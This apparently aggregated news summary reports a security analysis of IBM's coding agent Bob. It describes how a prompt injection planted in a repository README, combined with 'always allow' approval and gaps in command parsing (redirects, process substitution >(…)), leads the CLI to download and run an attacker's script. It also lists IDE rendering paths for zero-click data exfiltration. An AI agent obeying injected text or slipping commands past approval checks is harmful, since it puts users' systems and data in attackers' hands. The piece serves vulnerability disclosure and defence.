IBM Bob AI Vulnerability Lets CLI Download and Execute Malware Remotely

TL;DR

Researchers found that IBM's coding agent Bob (in Closed Beta) can be manipulated via indirect prompt injection so the CLI downloads and runs malware if a user enables 'always allow' for commands. The Bob IDE was also shown to expose known AI-specific data-exfiltration vectors in rendered outputs.

What happened

A security analysis of IBM's Bob — a closed-beta coding agent available as a CLI and an IDE — shows how indirect prompt injection can lead the CLI to fetch and execute arbitrary shell scripts without explicit user approval. The attack chain begins when Bob reads a repository README that persuades the agent it should run a phishing-training test. After Bob asks the user to approve benign commands several times and the user selects 'always allow' for a command such as 'echo', the attacker supplies a specially crafted command that exploits multiple command-validation gaps. The CLI’s multi-part command check fails to recognize chained commands using the redirect operator (>), and its substitution detector omits process substitution patterns like >(…). By prefixing the malicious payload with an approved benign command, the attacker leverages these blind spots to retrieve and run a script from an attacker-controlled server. Separately, the Bob IDE renders external Markdown images, Mermaid diagrams and pre-fetches JSON schemas in ways that can enable zero-click data exfiltration through attacker-controlled endpoints.

Why it matters

• An attacker who succeeds can deliver arbitrary shell scripts, enabling ransomware, credential theft, remote shells or cryptomining on a victim machine.
• Auto-approve settings ('always allow') can convert a seemingly minor convenience choice into a full-system compromise when combined with prompt-injection.
• The findings show both command-parsing logic and UI permission checks can create blind spots that attackers can chain together.
• IDE output rendering (images, diagrams, schema prefetch) introduces additional exfiltration risks even without explicit command execution.

Key facts

• The issue affects IBM Bob, offered as a Bob CLI and a Bob IDE; Bob was in Closed Beta at the time of the report.
• An indirect prompt injection in a repository README can trick Bob into performing a 'training' that prompts command execution.
• The CLI’s multi-part-command permission modal fails to detect process-substitution and redirect-chained sub-commands (e.g., >(…)).
• A missing detection branch in a minified JS function omitted recognition of the '>' followed by '(' pattern used in process substitution.
• By pre-pending a malicious payload with an approved benign command (e.g., echo), the attacker bypasses per-sub-command approval checks.
• Successful exploitation allows fetching and running a script from an attacker-controlled server, enabling multiple malware outcomes.
• The Bob IDE was observed to render Markdown images and Mermaid diagrams that request external resources and to prefetch JSON schemas, creating zero-click exfiltration vectors.
• IBM documentation warns that setting auto-approve for commands is 'high risk' and recommends whitelists and avoiding wildcards.

What to watch next

• not confirmed in the source
• not confirmed in the source
• not confirmed in the source

Quick glossary

• Prompt injection: An attack that places malicious instructions in user-provided text so an AI model interprets and acts on them.
• Process substitution: A shell feature that provides the output of a command to another command as if it were a file, commonly expressed as >(…).
• Zero-click data exfiltration: A technique where data is leaked without additional user interaction, often via auto-rendered elements that fetch external resources.
• Content Security Policy (CSP): A browser mechanism that controls which external resources a webpage is allowed to load to reduce attackers' ability to exfiltrate data.

Reader FAQ

Can IBM Bob download and execute malware without human approval?
According to the analysis, the Bob CLI can be induced to download and execute a script without explicit approval when a user has configured 'always allow' and an attacker exploits command-validation gaps.

Which Bob components were shown to be vulnerable?
The report identifies vulnerabilities in the Bob CLI that permit command-execution bypasses and in the Bob IDE that allow known data-exfiltration vectors.

Did IBM warn about the risks of auto-approving commands?
Yes. The documentation cited in the report flags auto-approve for commands as 'high risk' and recommends using whitelists and avoiding wildcards.

Has IBM released a patch or mitigation?
not confirmed in the source

Threat Intelligence Table of Content IBM AI ('Bob') Downloads and Executes Malware IBM's AI coding agent 'Bob' has been found vulnerable to downloading and executing malware without human approval through…

Sources

• IBM AI ('Bob') Downloads and Executes Malware
• IBM's AI agent Bob easily duped to run malware
• IBM Bob: Shift left for resilient AI with security-first principles
• Malicious Uses and Abuses of Artificial Intelligence

Related posts

• Cloudflare Radar Shows Iran Routing Anomalies Amid Apparent IPv6 Outage
• Illinois agency left personal data of over 700,000 residents exposed for years
• ICE Acquired Tool That Monitors Phones Across City Neighborhoods